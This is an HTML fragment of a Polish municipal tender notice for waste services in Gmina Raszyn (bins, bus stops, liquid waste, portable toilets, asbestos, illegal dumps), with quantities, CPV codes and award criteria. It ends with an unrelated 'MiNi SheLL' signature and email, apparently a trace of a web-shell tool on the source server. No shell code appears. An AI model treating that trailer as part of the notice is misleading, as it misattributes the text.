- Wykaz przystanków autobusowych objętych usługą zawiera załącznik nr 1.
- Wykaz koszy ulicznych objętych usługą zawiera załącznik nr 2.
Na zadanie składa się wykonanie czynności:
w zakresie ad. a)
- podstawianie pojemników ich opróżnianie i wywóz w zakresie nieczystości stałych z terenu Urzędu Gminy, tj.:
- 2 kontenery o poj. 7m3 - nie mniej niż 8 razy w miesiącu, opróżnianych na zgłoszenie telefoniczne Zamawiającego;
- 2 pojemników do segregacji odpadów w tym:
1 pojemnik o poj. 1 100 l koloru żółtego (na papier, tworzywa sztuczne i metale), 
1 pojemnik o poj. 240 l koloru białego (na szkło i opakowania szklane)
Opróżnianych raz na dwa tygodnie
w zakresie ad. b)
1/ sprzątanie i wywóz nieczystości z przystanków autobusowych zlokalizowanych w granicach Gminy Raszyn tj.:
- 67 szt. przystanków autobusowych wraz z opróżnianiem koszy betonowych z wkładami metalowymi o poj. 45l (w ilości 62 szt.):
- 17 szt. przystanków - 4 razy w tygodniu,
- 50 przystanków - 3 razy w tygodniu
2/ mycie wiat przystankowych zlokalizowanych w granicach Gminy Raszyn - 47 szt. - 1 raz w miesiącu,
w zakresie ad. c)
1/ opróżnianie i wywóz śmieci z koszy ulicznych o pojemności 45 l oraz 50 l, tj:
- 26 szt. ulicznych koszy betonowych z wkładami metalowymi - 3 razy w tygodniu,
2/ opróżnianie koszy ulicznych o pojemności 70l,
- 31 szt. ulicznych koszy betonowych z wkładami metalowymi - 3 razy w tygodniu
3/ opróżnianie koszy na psie odchody o pojemności 50l 
- 13 szt. - 3 razy w tygodniu. 
w zakresie ad. d)
1/ usuwanie zwłok bezdomnych zwierząt wraz z ich utylizacją z terenu Gminy Raszyn, 
- ok. 20 szt. w trakcie trwania umowy - na zgłoszenie telefoniczne Zamawiającego.

Wykaz przystanków autobusowych objętych usługą wraz z określeniem częstotliwości opróżniania koszy zawiera - załącznik nr 1.1,
Wykaz koszy ulicznych objętych usługą wraz z określeniem częstotliwości opróżniania koszy zawiera - załącznik nr 1.2..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.50.10.00-2, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktur - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2: Wywóz nieczystości płynnych z obiektów komunalnych Gminy Raszyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Wywóz nieczystości płynnych z obiektów komunalnych Gminy Raszyn
w zakresie 
a) wywozu nieczystości płynnych z obiektów mieszkalnych komunalnych Gminy Raszyn (w tym jednego wolnostojącego WC),
b)wywóz nieczystości płynnych obiektu Ochotniczej Straży Pożarnej w Falentach. 
Szacowana łączna ilość wywożonych nieczystości ciekłych wynosi - 1 188m3 w okresie trwania umowy.
Wykaz obiektów komunalnych objętych usługą zawiera - załącznik nr 2.1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.50.10.00-2, 90.51.31.00-7, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zadanie nr 3 Ustawienie wraz z serwisem przenośnych kabin sanitarnych (toalety WC).</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Ustawienie wraz z serwisem przenośnych kabin sanitarnych (toalety WC)
Zakres obejmuje: 
- postawienie wraz z serwisowaniem i utrzymaniem w czystości 3 sztuk kabin sanitarnych (WC) w wyznaczonych przez Zamawiającego miejscach.
Kabiny sanitarne (WC) zostaną postawione:
- teren parku Nad Raszynką w Raszynie - dwie toalety,
- teren placu zabaw dla dzieci przy ul. Wybickiego w Raszynie - jedna toaleta.
Zamawiający wymaga, aby serwisowanie kabin odbywało się 3 razy w tygodniu.
Szacunkowa ilość opróżnień kabin sanitarnych - 288 razy.
- postawienie wraz z serwisowaniem i utrzymaniem w czystości 5 sztuk kabin sanitarnych (WC) - (okolicznościowo, jednorazowo) w dniu 6 sierpnia 2015 r. na terenie Kościoła w Raszynie..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.50.10.00-2, 90.51.31.00-7, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.10.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Odbiór i wywóz nieczystości stałych z terenu jednostek organizacyjnych Gminy Raszyn.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Odbiór i wywóz nieczystości stałych z terenu jednostek organizacyjnych Gminy Raszyn
Zakres obejmuje: 
- postawienie, opróżnienia oraz wywóz nieczystości stałych z terenu jednostek organizacyjnych Gminy Raszyn,
- zapewnienie pojemników oraz kontenerów przeznaczonych do zbierania odpadów stałych.
Częstotliwość opróżniania i rodzaj pojemników:
- 1 kontener o poj. 7m3 - opróżniany 1 raz w tygodniu,
- 15 pojemników 1100 l - opróżniany średnio 1 razy w tygodniu,
- 7 pojemników 1100 l - opróżnianych średnio 2 razy w miesiącu,
- 1 pojemniki 1100 l - opróżnianych średnio 2 razy w tygodniu,
- 5 pojemniki 240l - opróżniany 1 raz w tygodniu,
- 2 pojemniki 240l - opróżniany średnio 2 razy w miesiącu,
- 3 pojemniki 110l - opróżniane 1 raz w tygodniu,
- 50 szt. worków 120 l - na odpady zielone w okresie maj - wrzesień.
Wykaz jednostek organizacyjnych objętych usługą wraz z określeniem częstotliwości opróżniania koszy zawiera - załącznik nr 4.1..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.50.10.00-2, 90.51.31.00-7, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Usuwanie wyrobów zawierających azbest.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Usuwanie wyrobów zawierających azbest
Zakres obejmuje: 
- odbiór, transport i utylizacja odpadów zawierających azbest pochodzący z pokryć dachowych budynków położonych na terenie Gminy Raszyn.
Szacunkowa ilość odpadów do wywiezienia w trakcie trwania umowy - 123 000kg..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.50.10.00-2, 90.51.31.00-7, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 15.12.2015.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktur - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Zadanie nr 6 Likwidacja dzikich wysypisk na terenie Gminy Raszyn oraz wywóz kontenerów z odpadami po wiosennych porządkach z terenu osiedla Falenty.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Likwidacja dzikich wysypisk na terenie Gminy Raszyn oraz wywóz kontenerów z odpadami po wiosennych porządkach z terenu osiedla Falenty 
Zakres obejmuje: 
- zbieranie, załadunek oraz wywóz odpadów nielegalnie wyrzucanych - stanowiących tzw. dzikie wysypiska. Teren po zebraniu odpadów należy uporządkować. 
Szacunkowa ilość odpadów do wywiezienia - 2 613,91m3/ rok. 
- zbieranie, załadunek oraz wywóz kontenerów z odpadami po wiosennych porządkach z terenu osiedla Falenty.
Szacunkowa ilość odpadów pochodzących z wiosennych porządków - 46,29m3/ rok.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 90.50.00.00-2, 90.50.10.00-2, 90.51.31.00-7, 90.51.20.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 29.02.2016.</li><li><p><b>4) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. termin płatności faktury - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com